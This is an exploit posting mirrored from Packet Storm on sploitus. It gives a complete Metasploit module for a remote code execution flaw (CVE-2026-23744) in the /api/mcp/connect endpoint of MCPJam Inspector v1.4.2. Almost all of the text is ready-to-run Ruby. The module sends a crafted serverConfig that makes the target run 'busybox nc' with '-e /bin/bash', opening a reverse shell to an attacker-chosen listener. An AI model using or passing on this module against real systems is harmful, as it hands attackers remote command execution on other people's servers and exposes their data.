Share
## https://sploitus.com/exploit?id=PACKETSTORM:219120
==================================================================================================================================
| # Title : MCPJam v1.4.2 Inspector RCE via /api/mcp/connect |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.mcpjam.com/ |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets a Remote Code Execution (CVE-2026-23744) vulnerability in MCPJam Inspector v1.4.2.
The flaw exists in the /api/mcp/connect endpoint, where user-controlled input is improperly passed to a backend execution mechanism.
[+] POC :
##
# This module requires Metasploit Framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MCPJam Inspector RCE (CVE-2026-23744)',
'Description' => %q{
This module exploits an RCE vulnerability in MCPJam Inspector API
via /api/mcp/connect endpoint.
It sends a malicious serverConfig that triggers command execution
using busybox nc reverse shell.
},
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-23744'],
['URL', 'https://github.com/advisories/GHSA-232v-j27c-5pp6']
],
'DisclosureDate' => '2026-02-01',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('RHOSTS', [true, 'Target host']),
OptPort.new('RPORT', [true, 'Target port', 443]),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'Base path', '/api/mcp/connect']),
OptString.new('LHOST', [true, 'Listener IP']),
OptString.new('LPORT', [true, 'Listener Port', '4444'])
])
end
def run
print_status("Target: #{datastore['RHOSTS']}")
print_status("Sending exploit...")
payload = {
"serverConfig" => {
"command" => "busybox",
"args" => [
"nc",
datastore['LHOST'],
datastore['LPORT'],
"-e",
"/bin/bash"
],
"env" => {}
},
"serverId" => "mcp_test_server"
}
begin
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI']),
'ctype' => 'application/json',
'data' => payload.to_json
)
if res
print_status("Response Code: #{res.code}")
print_line(res.body.to_s[0..200])
if res.code == 200
print_good("Exploit sent successfully. Check your listener!")
else
print_error("Exploit may have failed.")
end
else
print_error("No response from target.")
end
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================